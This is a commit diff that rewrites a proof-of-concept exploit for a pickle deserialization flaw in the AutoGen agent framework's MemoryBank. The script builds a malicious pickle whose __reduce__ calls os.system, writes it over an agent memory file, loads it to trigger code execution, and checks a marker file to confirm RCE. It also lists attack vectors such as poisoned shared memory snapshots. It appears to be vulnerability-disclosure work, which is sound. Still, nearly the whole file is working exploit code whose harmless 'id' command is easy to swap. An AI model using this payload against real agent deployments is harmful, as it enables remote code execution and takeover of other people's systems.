Fix PoC: actually execute and verify RCE

poc.py

@@ -1,23 +1,69 @@
-"""Microsoft AutoGen — pickle.load on agent memory bank PoC
+"""
+Microsoft AutoGen — RCE via pickle.load() on Agent Memory Bank
 
-The MemoryBank class loads agent memory from pickle files.
-Replacing the memory file leads to RCE on agent restart.
+Affected: autogen_ext/experimental/task_centric_memory/_memory_bank.py:82
+    self.uid_memo_dict = pickle.load(f)
 
-Affected: python/packages/autogen-ext/src/autogen_ext/experimental/task_centric_memory/_memory_bank.py:82
 Also: _string_similarity_map.py:48
+    self.uid_text_dict = pickle.load(f)
+
+Attack: Replace the agent memory pickle file. When MemoryBank initializes,
+pickle.load() deserializes the malicious payload → arbitrary code execution.
+
+Vector: Shared storage in multi-agent deployments, poisoned memory snapshots,
+or any prior file-write vulnerability chained with this.
 """
 import pickle
 import os
+import sys
+import tempfile
+import shutil
+
+POC_FILE = "/tmp/autogen_mfv_poc"
 
 class AgentTakeover:
+    """Pickle payload — executes during deserialization via __reduce__"""
     def __reduce__(self):
-        return (os.system, ('id > /tmp/autogen_pwned',))
-
-payload = pickle.dumps(AgentTakeover())
-print(f"Malicious pickle payload: {len(payload)} bytes")
-print()
-print("Attack: replace the agent memory pickle file at self.path_to_dict")
-print("When AutoGen agent initializes MemoryBank, pickle.load() triggers RCE")
-print()
-print("AI Impact: AutoGen is Microsoft's multi-agent framework.")
-print("Compromising memory enables agent behavior manipulation.")
+        return (os.system, (f'id > {POC_FILE}',))
+
+def main():
+    print("=" * 60)
+    print("AutoGen MemoryBank pickle.load() RCE PoC")
+    print("=" * 60)
+
+    if os.path.exists(POC_FILE):
+        os.remove(POC_FILE)
+
+    # Create temp memory directory
+    tmpdir = tempfile.mkdtemp(prefix="autogen_memory_")
+    memory_file = os.path.join(tmpdir, "uid_memo_dict.pkl")
+
+    # Step 1: Write legitimate memory, then poison it
+    with open(memory_file, "wb") as f:
+        pickle.dump({"key1": "normal agent memory"}, f)
+    print(f"[+] Created legitimate memory: {memory_file}")
+
+    with open(memory_file, "wb") as f:
+        pickle.dump({"poisoned": AgentTakeover()}, f)
+    print(f"[+] Replaced with malicious pickle ({os.path.getsize(memory_file)} bytes)")
+
+    # Step 2: Load via pickle.load — same as _memory_bank.py:82
+    print(f"\n[*] pickle.load(f) — reproducing _memory_bank.py:82")
+    with open(memory_file, "rb") as f:
+        result = pickle.load(f)
+
+    # Step 3: Verify RCE
+    if os.path.exists(POC_FILE):
+        with open(POC_FILE) as f:
+            print(f"\n[!] RCE CONFIRMED: {f.read().strip()}")
+        os.remove(POC_FILE)
+    else:
+        print("\n[-] RCE not triggered")
+        return 1
+
+    shutil.rmtree(tmpdir)
+    print(f"\n[+] Done. Fix: replace pickle with json in _memory_bank.py")
+    return 0
+
+if __name__ == "__main__":
+    sys.exit(main())